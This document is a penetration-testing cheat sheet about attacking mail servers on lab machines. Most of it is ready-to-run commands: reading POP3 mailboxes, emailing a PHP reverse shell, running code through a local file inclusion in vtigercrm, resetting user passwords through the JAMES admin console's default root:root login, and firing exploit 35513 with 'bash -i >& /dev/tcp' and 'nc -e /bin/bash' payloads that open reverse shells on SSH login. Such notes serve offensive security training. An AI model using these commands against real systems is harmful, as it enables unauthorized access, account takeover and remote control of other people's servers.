# Email SMTP
## Read emails
```
telnet 10.x.x.x 110
nc -nv 10.x.x.x 110
USER mindy
PASS hello
STAT
RETR 2
+OK Message follows
Delivered-To: mindy@localhost
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access
Dear Mindy,
Here is your password.. blah blah blah
```
## Send email with telnet
* SMTP: 25
* Bonus: Inject a php exploit.. you will need an LFI to read/execute it though
* REF: [PBX-PhpEmailExploit](https://pentest.mxhx.org/04-webapps/pbx-elastix#email-php-injection)
```
telnet $IP 25
EHLO beep.htb ..Any hello will work
VRFY hacked@localhost ..rejected
VRFY asterisk@localhost ..Verified
mail from:pwn@hacked.com
rcpt to:askerisk@localhost ..Same as Verified
data ..Begin Email
Subject:Testing!
Hello ..test #1
..test #2
..test #3
. ..to end the email
quit
```
## sendmail with attachment
* Instead of telnet, EHLO, blah blah...
* Send a Reverse shell php
```
> sendmail -t asterisk@localhost -o message-file=php-reverse-shell.php -u pwnd -s $IP:25 -f mike@mike.com
```
## execute and connect
* LFI Execution Example (for after you've sent the evil email)
```
> nc -nvlp 4444
> https://$IP/vtigercrm/graph.php?current_language=../../../../../../../../var/spool/mail/asterisk%00&module=Accounts&action
.. graph.php?lang=../../../var/mail/asterisk%00&module=Accounts&command=whoami HTTP/1.1
.. graph.php?lang=../../../var/mail/asterisk%00&module=Accounts&command=bash -i >& /dev/tcp/$IP/4444 0>&1 HTTP/1.1
|
Goal
```
## Files
```
cat /var/mail/askerisk
```
## Thunderbird
* If you have a user/pass, you can open thunderbird to browser emails
* You might find a password that you could use for SSH too!! REF: solidstateHTB
```
thunderbird
create new account: email
mindy@$10.x.x.x
password
read emails
```
## James Server 2.3.2
* Java Apache Mail Enterprise Server (JAMES)
* Open source SMTP and POP3 mail transfer agent and NNTP news server
*
* Default Login: **root:root**
* Connect and Reset user-email password
* Then use [Thunderbird](#thunderbird) email to look for clues
```
nmap -p- 10.x.x.x
PORT STATE SERVICE
25/tcp open smtp ..mail server will be present too
110/tcp open pop3 ..mail component
119/tcp open nntp ..not sure this is related
4555/tcp open rsip ..JAMES connect port for admin tool!!
nc $IP 4555 ..telnet works too
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
admin:admin ..fail
root:root ..ok
help
listusers
setpassword admin password
setpassword mindy password ..will update a user's email password
```
## James Server Exploit 2.3.2 (RCE)
* 35513 will get you a full-shell
* Requirements:
* Default login: root/root
* Must have a working ssh login user/pass (limited is ok)
* Need to update the payload for reverse-connect
* Will add a weird user account: ../../../etc/bash\_completion.d
* Sends email to our 'weird' user-directory
* When anybody logs into ssh, we will get execution
* Confused?
* Yes, you need an ssh login already.. but if its limited it wont do much
* This will get you a **full-shell**, instead of a limited
* Next step is to look for PrivEsc !!
```
searchsploit james
searchsploit -m linux/remote/35513.py
vim 35513.py
payload = 'bash -i >& /dev/tcp/$MyIP/4444 0>&1'
payload = 'nc -e /bin/bash $MyIP 4444 &' ..optional
python 35513.py $IP
python2.7 ./35513.py 10.x.x.x
[+]Connecting to James Remote Administration Tool...
[+]Creating user...
[+]Connecting to James SMTP server...
[+]Sending payload...
[+]Done! Payload will be executed once somebody logs in.
ssh user@server ..will pop the exploit
nc -nvlp 4444 ..listen
connected ..with full shell
```
## More
*